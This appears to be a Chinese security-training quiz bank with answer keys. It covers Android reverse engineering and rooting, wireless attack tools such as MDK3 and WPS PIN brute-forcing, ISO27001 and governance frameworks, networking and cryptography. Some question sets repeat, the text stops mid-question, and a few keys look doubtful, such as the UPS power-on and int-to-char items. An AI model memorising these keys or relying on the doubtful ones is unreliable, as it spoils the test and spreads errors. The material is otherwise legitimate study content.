21、静态分析是运行程序后进行调试?
A、 对
B、 错
您的答案: 标准答案: B
22、安卓反编译后会出现$符号字节码表示是匿名内部类?
A、 对
B、 错
您的答案: 标准答案: A
23、反编译安卓应用后,一般应该先查看哪一个smali文件的代码?
A、 编译程序打开控制台
B、 打开匿名类smali文件
C、 打开加密解密smali文件
D、 Main最主要smali文件
您的答案: 标准答案: D
24、在整个工作中,无权限程序1发送广播到程序2,有权限的程序2不能让程序1下载文件。()
A、 对
B、 错
您的答案: 标准答案: B
25、哪个选项不是利用Activity劫持对系统进行恶意攻击的?
A、 遍历运行中的程序
B、 恶意程序启动带标志的钓鱼试Activity覆盖正常的Activity
C、 用户在伪造的界面上进行操作
D、 查杀恶意程序发送的信息
您的答案: 标准答案: D
26、程序加载的时候有两种视图,分别是链接视图和执行视图。
A、 对
B、 错
您的答案: 标准答案: A
27、Dex文件结构是一个.class集合,它会把.class里变量、符号和字符串放在池子里面,通过索引来使用,来压缩文件大小。()
A、 对
B、 错
您的答案: 标准答案: B
28、APK保护Anti引用有四个层面,分别为java、native、emulator和资源。()
A、 对
B、 错
您的答案: 标准答案: A
29、不是Anti Emulator检测的是?
A、 属性检测
B、 物理机文件检测
C、 基于cache行为检测
D、 基于代码指令执行检测
您的答案: 标准答案: B
30、DexClassData类分别定义信息里不包括的是?
A、 Method信息
B、 Code信息
C、 Attribute信息
D、 ClassDataHeadr信息
您的答案: 标准答案: C
31、Method ids索引是一个相对于前一个索引的增量,例如:第一个方法是0,第二个方法相对于第一个方法偏移1,就是1。第三个方法相对于第二个方法偏移是1,其实还是1,意思是往下递加。
A、 对
B、 错
您的答案: 标准答案: A
32、Dex加密使用shell的Dex替换原始的Dex,把原始的Dex当成资源或者附加数据进行隐藏。()
A、 对
B、 错
您的答案: 标准答案: A
33、下面不是替换ClassLoader时机的?
A、 ContentProvider:OnCreate()
B、 Application: BaseContext()
C、 Application:OnCreate()
D、 Application:attachBaseContext()
您的答案: 标准答案: B
34、EvilDownload程序发送一个广播到DownloadManager程序接收,拥有权限的DownloadManager程序,可以让EvilDownload程序去下载文件。()
A、 对
B、 错
您的答案: 标准答案: A
35、下面对名称替换的概念性说法有误的是?
A、 把程序里面有意义的类、方法和字段替换无意义随机文本
B、 无意义的随机文有自动还原方法
C、 替换人员识别
D、 用Proguard自动还原
您的答案: 标准答案: B
36、if-ge vA,vB,:cond_** 的意思是?
A、 如果vA大于vB则跳转到:cond_**
B、 如果vA大于等于vB则跳转到:cond_**
C、 如果vA小于vB则跳转到:cond_**
D、 如果vA小于等于vB则跳转到:cond_**
您的答案: 标准答案: B
37、在安卓逆向中经常用到的ADB全称是什么?
A、 Android DataBase
B、 Android Debug Bridge
C、 Asian Development Bank
D、 Apple Desktop Bus
您的答案: 标准答案: B
38、以下哪些功能不是ADB的常用功能?
A、 查看logcat日志
B、 端口转发
C、 shell命令
D、 hook进程
您的答案: 标准答案: D
39、以下命令中哪个是(使用ADB)安装apk的正确命令?
A、 adb install c:\file.apk
B、 adb uninstall c:\file.apk
C、 adb install my.app.client
D、 adb uninstall my.app.client
您的答案: 标准答案: A
40、安卓root的过程中需要对/system/bin/su设置什么权限?
A、 444
B、 755
C、 6755
D、 6444
您的答案: 标准答案: C
41、android中最高权限的用户是?
A、 administrator
B、 root
C、 system
D、 su
您的答案: 标准答案: B
42、android在root的过程中以下哪种说法是错误的?
A、 把su文件放到/system/bin/中
B、 设置/system/bin/su让管理员用户课运行
C、 superuser.apk放到system/app下面
D、 把su文件放到/system/xbin/中
您的答案: 标准答案: B
43、android系统中主要存放核心文件的目录是?
A、 \system\bin
B、 \system\framework
C、 \system\lib
D、 \system\etc
您的答案: 标准答案: B
44、ro.debuggable=1参数的意思系统中所有的程序允许调试?
A、 对
B、 错
您的答案: 标准答案: A
45、Ascii码53,57,49,48对应的数字是?
A、 5912
B、 5801
C、 5910
D、 6910
您的答案: 标准答案: C
46、以下哪个工具可以直接反编译DEX文件为Java源码?
A、 APK改之理
B、 JEB
C、 android逆向助手
D、 android killer
您的答案: 标准答案: B
47、APK改之理工具的“Dalvik Debug Monitor Service“功能一下说法错误的是?
A、 调试apk
B、 反汇编源码
C、 查看日志
D、 查看进行
您的答案: 标准答案: B
48、apktool反编译后其大部分文件后缀为?
A、 .c
B、 .java
C、 .smail
D、 .dalvik
您的答案: 标准答案: C
49、以下哪个不是java语言的内部类?
A、 成员内部类
B、 静态嵌套类
C、 匿名内部类
D、 函数内部类
您的答案: 标准答案: D
50、dalvik虚拟机对应的(文件格式)为.dex压缩格式
A、 对
B、 错
您的答案: 标准答案: A
1、下列关于WAIDPS的描述正确的是?
A、 WAIDPS是一个无线入侵检测工具
B、 WAIDPS是一个无线入侵工具
C、 WAIDPS是一个无线扫描工具
D、 WAIDPS是一个网站入侵检测工具
您的答案: 标准答案: A
2、WAIDPS在认证解除中检测攻击信息会存入下列哪项文件中?
A、 config.ini
B、 pktconfig.ini
C、 attacks
D、 pcap
您的答案: 标准答案: D
3、下列选项中破解wifi不需要握手包的是?
A、 wifi万能钥匙
B、 PIN码穷举
C、 字典破解
D、 WEP秘钥
您的答案: 标准答案: A
4、下列关于802.11a与802.11b描述有误的是 ?
A、 802.11a采用正交频分复用技术
B、 两种协议出现于1999年
C、 802.11a完全不可以适应无线电信号
D、 802.11b采用普遍使用的2.4赫兹频段技术
您的答案: 标准答案: C
5、常见的无线网卡运行模式有几种?
A、 4
B、 5
C、 6
D、 7
您的答案: 标准答案: C
6、下列关于无线pin码破解的描述错误的是____。
A、 WPS技术会随机产生一个8位数字的字符串作为PIN码
B、 PIN码会做对半处理,分前4位和后4位进行匹配
C、 前4位如果匹配错误的话直接drop请求
D、 后4位与前4位一样,前4位如果爆破通过在继续爆破后4位,最后通过认证。
您的答案: 标准答案: D
7、下列关于无线pin码破解的描述错误的是____。
A、 WPS技术会随机产生一个8位数字的字符串作为PIN码
B、 PIN码会做对半处理,分前4位和后4位进行匹配
C、 前4位如果匹配错误的话直接drop请求
D、 后4位与前4位一样,前4位如果爆破通过在继续爆破后4位,最后通过认证。
您的答案: 标准答案: D
8、无线局域网(WLAN)标准IEEE 802.11g规定的最大数据速率是____。
A、 1 Mb/s
B、 11 Mb/s
C、 5 Mb/s
D、 54 Mb/s
您的答案: 标准答案: D
9、在中国,无线载波信道的使用范围是____。
A、 1-11
B、 1-12
C、 1-13
D、 1-14
您的答案: 标准答案: C
10、四种管理帧中包含无线SSID信息的是____。
A、 关联帧
B、 认证帧
C、 探测帧
D、 信标帧
您的答案: 标准答案: D
11、MDK3 是一款无线DOS 攻击测试工具。
A、 正确
B、 不正确
您的答案: 标准答案: A
12、MDK3将可疑数据存入下列哪项文件以备进一步分析?
A、 PCAP
B、 CONFIG.INI
C、 py文件
D、 php文件
您的答案: 标准答案: A
13、MDK3 攻击的是无线AP。
A、 正确
B、 不正确
您的答案: 标准答案: A
14、MDK3可以用来检查隐藏接入点。
A、 正确
B、 不正确
您的答案: 标准答案: A
15、WAIDPS可以检测到MDK3的攻击。
A、 正确
B、 不正确
您的答案: 标准答案: A
16、WAIDPS攻击时会冒用MAC地址以隐藏自己。
A、 正确
B、 不正确
您的答案: 标准答案: A
17、WAIDPS检测到攻击会将攻击数据包详情储存到一个文件夹中以备分析。
A、 正确
B、 不正确
您的答案: 标准答案: A
18、Ascii码53,57,49,48对应的数字是?
A、 5912
B、 5801
C、 5910
D、 6910
您的答案: 标准答案: C
19、以下哪个工具可以直接反编译DEX文件为Java源码?
A、 APK改之理
B、 JEB
C、 android逆向助手
D、 android killer
您的答案: 标准答案: B
20、APK改之理工具的“Dalvik Debug Monitor Service“功能一下说法错误的是?
A、 调试apk
B、 反汇编源码
C、 查看日志
D、 查看进行
您的答案: 标准答案: B
21、apktool反编译后其大部分文件后缀为?
A、 .c
B、 .java
C、 .smail
D、 .dalvik
您的答案: 标准答案: C
22、以下哪个不是java语言的内部类?
A、 成员内部类
B、 静态嵌套类
C、 匿名内部类
D、 函数内部类
您的答案: 标准答案: D
23、dalvik虚拟机对应的(文件格式)为.dex压缩格式
A、 对
B、 错
您的答案: 标准答案: A
24、以下哪个类型不属于dalvik的原始数据类型?
A、 boolean
B、 float
C、 varchar
D、 short
您的答案: 标准答案: C
25、.registers指定了方法中寄存器的总数?
A、 对
B、 错
您的答案: 标准答案: A
26、cconst-wide/16 vx, lit16 的意思是存入int常量道vx,vx+1寄存器,扩展int型常量位long常量
A、 对
B、 错
您的答案: 标准答案: A
27、add-int a,b,c 位计算 a+b 并将结果存入c。
A、 对
B、 错
您的答案: 标准答案: B
28、sub-int/2addr a,b 为计算a-b并将结果存入a。
A、 对
B、 错
您的答案: 标准答案: A
29、以下哪个指令是无符号右移指令?
A、 ushr-int
B、 shr-long
C、 shr-int/2addr
D、 shr-long/2addr
您的答案: 标准答案: A
30、shl-long a,b,c代表左移b、b+1,c指定移动的位置,结果存入a,a+1。
A、 对
B、 错
您的答案: 标准答案: A
31、以下哪个类型转换指令为整型转换为字符串型?
A、 int-to-byte
B、 int-to-char
C、 int-to-short
D、 int-to-long
您的答案: 标准答案: B
32、以下那个是通过短偏移量无条件跳转到目标的指令?
A、 goto/8:goto_0
B、 goto32:goto_0
C、 goto/16:goto_0
D、 goto:goto_0
您的答案: 标准答案: D
33、使用http传输回来文件的下载地址和文件的md5能保证文件不会被替换
A、 对
B、 错
您的答案: 标准答案: B
34、如果被中间人劫持,但是下载安装的apk和手机上装的apk的包名一样,这时候会提示什么
A、 与已安装的程序签名不一致
B、 正常安装无提示
C、 程序已安装
D、 提示程序更新
您的答案: 标准答案: A
35、apk升级漏洞一般发生在什么情况下?( )
A、 APK自升级
B、 应用市场提示升级
C、 应用后台挂起时
D、 设备关机时
您的答案: 标准答案: A
36、APK加固在一定程度上有助于防止签名绕过?
A、 对
B、 错
您的答案: 标准答案: A
37、Android会把什么文件用私钥计算出签名, 然后将签名以及包含公钥信息的数字证书一同写入CERT.RSA 中保存?( )
A、 AndroidManifest.xml
B、 MANIFEST.MF
C、 CERT.RSA
D、 CERT.SF
您的答案: 标准答案: D
38、在保护APK文件不被修改时哪种验证不常见?()
A、 MD5校验
B、 签名校验
C、 文件名校验
D、 加固自校验
您的答案: 标准答案: C
39、动态注册的广播是导出的?( )
A、 对
B、 错
您的答案: 标准答案: A
40、以下选项中不算提权后危害的是?()
A、 数据泄露
B、 消息伪造
C、 钓鱼
D、 修补自身漏洞
您的答案: 标准答案: D
41、NanoHttpd核心的处理函数是什么?( )
A、 isAlive
B、 registerConnection
C、 serve
D、 getListeningPort
您的答案: 标准答案: C
42、哪种可以通过网络与Android应用通信?()
A、 PF_UNIX
B、 PF_INET
C、 PF_NETLINK
D、 pf_packet
您的答案: 标准答案: B
43、模型检测(model checking)是一种很重要的半自动验证技术
A、 对
B、 错
您的答案: 标准答案: B
44、模型检测(model checking)主要通过()或隐式不动点计算来验证有穷状态并发系统的模态/命题性质
A、 后台检测
B、 隐式状态搜索
C、 显式状态搜索
D、 数据匹配
您的答案: 标准答案: C
45、以下选项中不是模型检测(model checking)应用领域的是?
A、 大数据处理
B、 排工问题
C、 漏洞检测
D、 Monty hall Problem and Intel CPU
您的答案: 标准答案: A
46、强制攻击一般发现在什么情况下?
A、 APT攻击
B、 xss攻击
C、 sql注入
D、 暴力破解
您的答案: 标准答案: D
47、以下选择中不是用于应用分析的工具是?
A、 ida
B、 apkide
C、 loadpe
D、 lldb
您的答案: 标准答案: C
48、使用http传输回来文件的下载地址和文件的md5能保证文件不会被替换
A、 对
B、 错
您的答案: 标准答案: B
49、APK加固在一定程度上有助于防止签名绕过?
A、 对
B、 错
您的答案: 标准答案: A
50、动态注册的广播是导出的?( )
A、 对
B、 错
您的答案: 标准答案: A
1、下列关于信息安全CIA标准的描述错误的是____。
A、 保密性是指信息不能泄露给未授权者,确保合适的人看到信息
B、 完整性是指防止未授权更改
C、 可用性是指根据用户要求访问使用特性
D、 保密性可以通过使用散列、配置变更、访问控制、数字签名来实现
您的答案: 标准答案: D
2、"由于缺少灭火器材,而导致火灾的发生使计算机遭到破坏"对于这个安全事件的描述正确的是____。
A、 缺少灭火器材是安全威胁,计算机受到破坏是安全风险
B、 发生火灾是安全威胁,缺少灭火器材是安全脆弱性
C、 计算机遭到破坏是安全威胁,缺少灭火器材是安全脆弱性
D、 发生火灾时安全脆弱性,缺少灭火器材是安全风险
您的答案: 标准答案: B
3、下列对企业安全框架的描述错误的是____。
A、 企业信息安全框架要考虑企业的多样性。不同的企业信息安全的重点和关注点有所不同
B、 帮助解决不同部门之间的协同作业问题
C、 企业信息安全框架有三个要素分别是:安全管理、安全运维、安全技术建设
D、 企业安全框架就是一种全方位的安全防御系统
您的答案: 标准答案: D
4、下列对于TOGAF框架的描述错误的是____。
A、 实现了一个迭代步骤方法
B、 实现了企业连续统一
C、 实现了产品快速高效开发
D、 实现了架构能力管理
您的答案: 标准答案: C
5、下列对于SABSA模型描述错误的是____。
A、 企业信息安全结构开发的模型和方法论
B、 包括战略、概念、实施、度量、审计层次
C、 类似于Zachman,但从安全角度定义需求
D、 是一种迭代模型
您的答案: 标准答案: D
6、下列不属于Cobit模型中业务目标的准则的是____。
A、 有效性
B、 机密性
C、 统一性
D、 完整性
您的答案: 标准答案: C
7、以下选项中哪一项不是ITIL模型的核心?
A、 服务设计
B、 服务操作
C、 服务优化
D、 服务转换
您的答案: 标准答案: C
8、在企业中 ,安全开发人员架构不包括以下哪一项?
A、 监控开发
B、 众测
C、 安全产品开发
D、 开发安全
您的答案: 标准答案: B
9、下列选项中对于企业安全开发人员的职能描述正确的是?
A、 策略标准的制定
B、 业务系统环境安全测试
C、 系统安全加固
D、 根据企业的安全需求开发定制安全产品
您的答案: 标准答案: D
10、下列选项中对风险管理团队的工作描述错误的是?
A、 量化威胁的可能性及对业务的影响
B、 记录和识别风险过程于措施
C、 对员工进行安全意培训
D、 开发衡量标准,及管理各种风险
您的答案: 标准答案: A
11、下列选项中对于信息安全委员会的信息安全管理员的岗位职责描述错误的是?
A、 推广企业信息安全策略,给出安全管理指南
B、 代表本专业、本部门独立客观发表评审意见
C、 决策公司安全规划方向
D、 定期审阅并及时更新信息安全管理策略
您的答案: 标准答案: C
12、下列选项中不是ISO27001安全属性的是?
A、 保密性
B、 完整性
C、 可用性
D、 持续性
您的答案: 标准答案: D
13、SOA适用性声明ISO27001:2013中的介质处理不包括以下哪个选项?
A、 可移动介质的管理
B、 介质的处理
C、 访问控制策略
D、 物理介质传输
您的答案: 标准答案: C
14、下列选项中对于安全策略的描述错误的是?
A、 为达到特定目标而执行的详细步骤
B、 满足公司所有法律法规
C、 根据组织变化迭代发布版本
D、 表达专业和重要性,不含无法理解语言陈述
您的答案: 标准答案: A
15、个人工作经历数据属于信息分类的哪一级别?
A、 公开
B、 隐私
C、 敏感
D、 机密
您的答案: 标准答案: B
16、身份标识的主体不包括以下哪个选项?
A、 令牌
B、 用户
C、 程序
D、 系统
您的答案: 标准答案: A
17、物理安全中入侵破坏的响应对策不包括____。
A、 警察
B、 消防
C、 医务
D、 警示
您的答案: 标准答案: D
18、网络数据使用哪种接口进行传输
A、 RJ11
B、 RJ45
C、 RJ12
D、 RJ48
您的答案: 标准答案: B
19、语音数据传输采用哪种线缆材料传输
A、 4芯
B、 5芯
C、 6芯
D、 5类非屏蔽线
您的答案: 标准答案: A
20、工程布线设计应采用什么方式完成走线
A、 上走线
B、 下走线
C、 弱电间
D、 机柜内
您的答案: 标准答案: A
21、企业布线过程中,机房不需要布设语音点
A、 对
B、 错
您的答案: 标准答案: B
22、UPS的总开关跟其他的开关保持
A、 相连
B、 独立
C、 级联备份
您的答案: 标准答案: B
23、当市电断电后再保持供电的UPS是哪种
A、 在线式
B、 后备式
C、 在线互动式
您的答案: 标准答案: B
24、UPS关机步骤应该是
A、 先将UPS面板关机,使UPS处于旁路工作继续对电池供电,再逐个关掉负载,最后完全断电
B、 逐个关闭负载,再将UPS面板关机,然后再将UPS完全关闭,断开市电
C、 断开市电,再将UPS面板关机,逐个关闭负载,最后再关UPS
您的答案: 标准答案: B
25、在使用UPS的情况下,开关设备的时候,应当所有设备一起打开,这样会保证系统的同步运行
A、 对
B、 错
您的答案: 标准答案: A
26、标准确认书应该包含有什么需求
A、 测试需求
B、 系统需求
C、 软件需求
您的答案: 标准答案: A
27、在工程实施之前,验收方可以不给施工方弱电布线图纸,但施工结束后必须有图纸
A、 对
B、 错
您的答案: 标准答案: B
28、在OSI七层协议中,提供一种建立连接并有序传输数据的方法的层是
A、 传输层
B、 表示层
C、 会话层
D、 应用层
您的答案: 标准答案: C
29、网络中端口与端口之间连接所用的层是
A、 网络层
B、 表示层
C、 应用层
D、 传输层
您的答案: 标准答案: D
30、IPV4是32位网络地址
A、 对
B、 错
您的答案: 标准答案: A
31、在无线协议里面,能够达到54Mbps/2.4GHz频段的协议类型是
A、 802.11 x
B、 802.11 a
C、 802.11 g
D、 802.11 I
您的答案: 标准答案: C
32、在云技术服务里,支持软件云服务,按权限访问特定应用的技术是
A、 SaaS
B、 IaaS
C、 PaaS
您的答案: 标准答案: A
33、代表非盈利性组织的域名是
A、 COM
B、 ORG
C、 NET
D、 INT
您的答案: 标准答案: B
34、在现代网络中3g网络的频谱能达到1800MHz
A、 对
B、 错
您的答案: 标准答案: B
35、保存着路由器上当前IOS版本的介质是
A、 ROM
B、 RAM
C、 Flash
D、 NVRAM
您的答案: 标准答案: C
36、哪种存储介质掉电后数据不易丢失
A、 ROM
B、 NVRAM
C、 Flash
您的答案: 标准答案: B
37、在CISCO命令行界面中只有一个#的模式表示什么
A、 enable模式
B、 用户模式
C、 配置模式
您的答案: 标准答案: A
38、一般路由器界面中,有两级访问权限,用户级和特权级
A、 对
B、 错
您的答案: 标准答案: A
39、配置默认路由正确的命令是
A、 R1(config-if)#ip route 0.0.0.0 100.0.0.2
B、 R1(config-if)#ip route 0.0.0.0 0.0.0.0 100.0.0.2
C、 R1(config-if)#ip route 100.0.0.2 0.0.0.0
D、 R1(config-if)#ip route 100.0.0.2 0.0.0.0 0.0.0.0
您的答案: 标准答案: B
40、有几个RFC定义了IPsec的核心
A、 一个
B、 两个
C、 三个
D、 四个
您的答案: 标准答案: C
41、当一个路由器接收到发往另一个路由器的内部网络报文时,IPSEC暂不会被启动,只有当传输数据时才会启动
A、 对
B、 错
您的答案: 标准答案: B
42、以下哪种描述是ntdp协议的作用
A、 时间同步
B、 收集网络拓扑信息
C、 网络扫描工具
您的答案: 标准答案: B
43、ACL的作用是什么
A、 控制网络服务质量
B、 访问控制列表
C、 增强内部网关路由协议
D、 地址解析协议
您的答案: 标准答案: B
44、路由器命令中全双工配置命令是
A、 duplex full
B、 duplex auto
C、 duplex half
您的答案: 标准答案: A
45、密码学家对以下属于高频字母的分类是
A、 D,L,U,C,M
B、 P,F,Y,W,G,B,Y
C、 E,T,A,O,N,I,R,S,H
您的答案: 标准答案: C
46、近代密码学的理论主要手段是替代和换位
A、 对
B、 错
您的答案: 标准答案: A
47、密码管理过程中唯一要保护的是
A、 密钥
B、 算法
C、 加密方法
您的答案: 标准答案: A
48、密码学转换技术里的雪崩效应是指
A、 算法用于确保加密过程中不会产生某种模式的随机值。与密钥一同使用,传输时不用加密
B、 与扩散类似,算法输入值轻微的变化会引起输出值的显著变化
C、 明文加密之前对其把明文的最后一个块增加到每一块需要的长度
您的答案: 标准答案: B
49、已知明文攻击的方法是
A、 攻击者选择特定明文发给受害者,待受害者加此明文发送出去后,再截
B、 攻击者拥有一条或多条消息的明文和相对应的密文
C、 通过搜集外部的信息来分析进行攻击
您的答案: 标准答案: B
50、何种加密类型是128位分组,密钥长度可为128,192,256,进行16轮运算
A、 CAST
B、 IDEA
C、 Twofish
您的答案: 标准答案: C
1、针对哈希算法的攻击方式是
A、 暴力攻击
B、 信息载荷
C、 数学分析
您的答案: 标准答案: A
2、消息分组为512位,产生128位的散列值是哪种密码技术
A、 RSA
B、 ECC
C、 MD5
您的答案: 标准答案: C
3、AES算法,要求是分组算法,支持128,192,256密钥长度
A、 对
B、 错
您的答案: 标准答案: A
4、哪种属于业务过程中的无限事件
A、 台风洪水
B、 网络中断
C、 信息损失
D、 交通瘫痪
您的答案: 标准答案: A
5、业务连续性发生中断的时候最大的影响是哪种行业
A、 医疗
B、 能源
C、 媒体
您的答案: 标准答案: B
6、BCP的活动包括哪个
A、 分配责任
B、 物流统计
C、 工程管理
您的答案: 标准答案: A
7、属于业务影响分析的是
A、 BCP
B、 BIA
C、 DRP
D、 ISO
您的答案: 标准答案: B
8、以下哪个是平均故障间隔时间
A、 MTTR
B、 MTBF
C、 MTBD
您的答案: 标准答案: B
9、BCP的策略过程包括建立技能和培训工作,帮助制定各种连续性选项
A、 对
B、 错
您的答案: 标准答案: B
10、包含政策,组织,业务,资源的国际标准是
A、 BCP
B、 BS25999-2
C、 IEC27031
D、 DRI
您的答案: 标准答案: B
11、BS25999是关于什么的标准
A、 英国BSI业务连续性管理
B、 国际协会专业实践
C、 业务连续性有序实践
您的答案: 标准答案: A
12、DRI是用来取代ISO22301国际标准的
A、 对
B、 错
您的答案: 标准答案: B
13、OWASP Mobile Risks里的设备信息未保护是属于哪一项
A、 密码破解
B、 意外的数据泄漏
C、 同过不可信输入进行安全决策
D、 不安全的数据存储
您的答案: 标准答案: D
14、哪种情况属于软件出现开发问题的时候使软件进入冷重启加载
A、 发生一个内核故障,以受控的方式关闭系统
B、 以不受控方式出现之后
C、 一个意外内核或介质故障
您的答案: 标准答案: C
15、在开发安全里,哪种属于软件的脆弱性测试
A、 不得明文方式传送命令数据
B、 内核缺陷
C、 软件的许可问题
您的答案: 标准答案: B
16、在软件开发阶段,安全没有纳入重要考虑因素是安全隐患来源
A、 对
B、 错
您的答案: 标准答案: A
17、数据库模型当中,属于层次数据库的是
A、 组合逻辑树结构中相关联的记录和字段如LDAP
B、 使用属性行和元组列来包含组织信息是广泛的模型
C、 设计为管理多种不同类型的数据
D、 允许每个数据元素用于多个父节点和子记录
您的答案: 标准答案: A
18、哪种是第二代编程语言
A、 机器语言
B、 汇编语言
C、 自然语言
您的答案: 标准答案: B
19、在web开发过程中对于用户要操作重要的操作建议采用
A、 密码要小于6位方便记忆
B、 验证码使用后不要失效
C、 接受短信验证码
您的答案: 标准答案: C
20、确定目标,识别解决风险,开发和测试,计划下次迭代的是哪种开发模型
A、 增量模型
B、 原型模型
C、 螺旋模型
您的答案: 标准答案: C
21、分析和快速设计是增量模型中的一种
A、 对
B、 错
您的答案: 标准答案: B
22、瀑布式模型一般分为几个阶段
A、 4个
B、 3个
C、 2个
D、 1个
您的答案: 标准答案: A
23、传统项目中不包含单元测试
A、 对
B、 错
您的答案: 标准答案: B
24、最好的架构,需求和设计出自于
A、 团队
B、 经理
C、 设计
您的答案: 标准答案: A
25、敏捷不是指下面的哪一种
A、 方法论
B、 价值观
C、 原则
您的答案: 标准答案: A
26、公司治理模型中 COSO 和 Cobit的关系正确的是?
A、 COSO 模型和 CobiT 模型一样重要
B、 CobiT 模型比 COSO 模型重要
C、 COSO 模型比 CobiT 模型重要
D、 COSO 模型是 CobiT 模型的一部分
您的答案: 标准答案: C
27、COSO 是 IT 风险控制模型是否正确?
A、 对
B、 错
您的答案: 标准答案: B
28、在开发过程中,对于已经做过的事情,进行重复性利用,属于CMMI模型中的哪一级?
A、 初始级
B、 已管理级
C、 已定义级
D、 量化管理级
您的答案: 标准答案: B
29、ITIL 模型是一套应用于IT服务管理的实践标准是否正确?
A、 对
B、 错
您的答案: 标准答案: A
30、不属于渗透工程师主要职能的有?
A、 新产品的安全测试
B、 调研要测试目标的信息
C、 修改测试产品出现的错误
D、 出具测试报告及修复方案
您的答案: 标准答案: C
31、CXO 并不需要承担公司法律及业务责任是否正确?
A、 对
B、 错
您的答案: 标准答案: B
32、对企业员工进行安全意识培训属于以下哪一团队职责?
A、 风险管理团队
B、 风险测试团队
C、 风险分析团队
D、 风险评估团队
您的答案: 标准答案: A
33、风险分析团队需要对风险造成的影响和对策的成本之间达到预算平衡的效果,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
34、以下说法错误的是?
A、 信息安全管理员有责任推广企业信息安全策略,给出安全管理指南
B、 信息安全主任委员有权利决策公司安全规划方向
C、 信息安全委员秘书负责组织安拍和召集评审会议、会议记录
D、 信息安全委员秘书可以决策公司安全规划方向
您的答案: 标准答案: D
35、信息安全委员会有权对各部门的资源访问权限做限制,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
36、ISO27001:2005 的内容不包括:
A、 安全方针
B、 访问控制
C、 资产管理
D、 产品发布
您的答案: 标准答案: D
37、ISO27001:2013 标准内容包括14个领域和113个控制措施,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
38、SOA适用性声明ISO27001中提到的物理环境安全不包括以下哪一项?
A、 物理入口控制
B、 密码策略
C、 办公室、房间和设施的安全保护
D、 公共访问、交接区安全
您的答案: 标准答案: B
39、在SOA适用性声明ISO27001中,网络服务的安全属于网络安全管理中的一部分,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
40、以下步骤不属于ISMS模型的有哪一项?
A、 实施所选的控制措施以满足控制目标
B、 对ISMS实施可识别的改进
C、 对项目进行检测、控制
D、 定义ISMS策略、范围
您的答案: 标准答案: C
41、ISMS模型中的 CHECK ,是指定义ISMS策略、范围,是否正确?
A、 对
B、 错
您的答案: 标准答案: B
42、以下属于信息所有者应承担的责任的是?
A、 接受企业风险级别,承担风险首责
B、 策略控制失效首责
C、 监控、分析、变更事项首责
D、 本职工作数据安全责任
您的答案: 标准答案: D
43、员工的工作经历在信息分类中属于隐私信息,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
44、以下属于性能测试的是哪一项?
A、 硬盘性能
B、 虚拟机配置
C、 数据库管理
D、 应用配置
您的答案: 标准答案: A
45、建立策略目录树,可以方便信息安全策略的规划和实施,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
46、以下对SSO验证说法正确的是哪一项?
A、 根据用户已知的内容进行验证,如密码
B、 根据用户拥有的物品进行验证,如钥匙
C、 根据用户身份进行验证,如指纹
D、 通过一个合法授权管理访问多个授权系统
您的答案: 标准答案: D
47、身份验证是一种执行策略,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
48、访问控制模型不包括以下哪一项?
A、 自主访问控制
B、 强制访问控制
C、 角色型访问控制
D、 访客访问控制
您的答案: 标准答案: D
49、Bell-LaPadula 模型中的强星型规则是指,一个主体只能在一个安全级别上执行,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
50、以下不属于技术实践威胁的是?
A、 文档下载
B、 字典攻击
C、 登录欺骗
D、 网络钓鱼
您的答案: 标准答案: A
1、以下不属于技术实践威胁的是?
A、 文档下载
B、 字典攻击
C、 登录欺骗
D、 网络钓鱼
您的答案: 标准答案: A
2、进行密码爆破属于字典攻击,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
3、以下哪项不属于企业安全环境中的物理安全?
A、 配电系统
B、 墙壁和天花板建筑材料
C、 外围组件
D、 钓鱼页面
您的答案: 标准答案: D
4、在企业工作环境物理安全中,墙壁天花板的材料选用、防火等级、承重并不重要,是否正确?
A、 对
B、 错
您的答案: 标准答案: B
5、视频中提到,液体(石油)在火灾级别中属于哪一类?
A、 A类
B、 B类
C、 C类
D、 D类
您的答案: 标准答案: B
6、为了保护计算机和数据要定期对计算机做数据备份,是否正确?
A、 对
B、 错
您的答案: 标准答案: A
7、下面那个选项不是企业信息安全范围三大控制的():
A、 管理控制
B、 物理控制
C、 虚拟控制
D、 技术控制
您的答案: 标准答案: C
8、国际通用CIA准则环境三角那个不是():
A、 保密性
B、 完整性
C、 实践性
D、 可用性
您的答案: 标准答案: C
9、企业信息安全范围三大控制中,管理控制包括风险管理、安全治理、操作安全、法律法规、业务连续行控制和灾难格式计划。()
A、 对
B、 错
您的答案: 标准答案: B
10、下面对安全风险的定义不正确的是():
A、 缺少安全措施的一种缺陷
B、 利用识别脆弱性不会带来安全威胁
C、 显示一个脆弱性的列子
D、 威胁主体利用脆弱性带来的影响
您的答案: 标准答案: B
11、通过资产价值,威胁价值来赋值划分安全等级错误的是():
A、 6,高
B、 4~5,高
C、 1~3,低
D、 4~5,中
您的答案: 标准答案: B
12、信息安全定义属性有风险、暴露、威胁和脆弱性。()
A、 对
B、 错
您的答案: 标准答案: A
13、企业信息框架、信息安全规划所有部门沟通正确的是():
A、 说的一些事情、术语不一样,业务纯利润、保值投资策略,产品,业务无风险
B、 利用信息安全框架模型组织共鸣,来组织有共同的话题、方向和内容
C、 业务一般都理解你技术花在方案上
D、 技术一般都理解业务这个利润的价值和谁在做怎样的事情
您的答案: 标准答案: B
14、根据安全人员架构不是安全职能的是():
A、 安全教育培训
B、 审计部门
C、 执行管理者:CXO
D、 安全管理者:CIO、CISO、CTO
您的答案: 标准答案: A
15、CXO不包括CIO/CISO/CSO/CPO/CTO这些企业安全架构。()
A、 对
B、 错
您的答案: 标准答案: B
16、通用安全模型ISO27001安全属性黄金三角正确的是():
A、 完整性:未授权者能对信息更改
B、 保密性:信息不能泄露给未授权者,确保那些适合的人能访问或看到信息
C、 保密性:信息泄露能给未授权者,也可以访问或看到信息
D、 可用性:用户要求访问使用特性,不用确保授权人在使用信息
您的答案: 标准答案: B
17、通用安全模型ISO27001能给未授权者访问到信息,更改信息和使用信息。()
A、 对
B、 错
您的答案: 标准答案: B
18、企业的安全标准,战术目标说法正确的是():
A、 强制性活动,动作或规划,确保组织机构之间同意方式
B、 违反战术的标准内容
C、 做到和不支持策略的战术工具
D、 所谓的标准不需要满足策略存在的战术工具
您的答案: 标准答案: A
19、下面对措施说法错误的是():
A、 措施不是为项目、计划任务而存在的
B、 为完成步骤,制定的人员,范围,活动
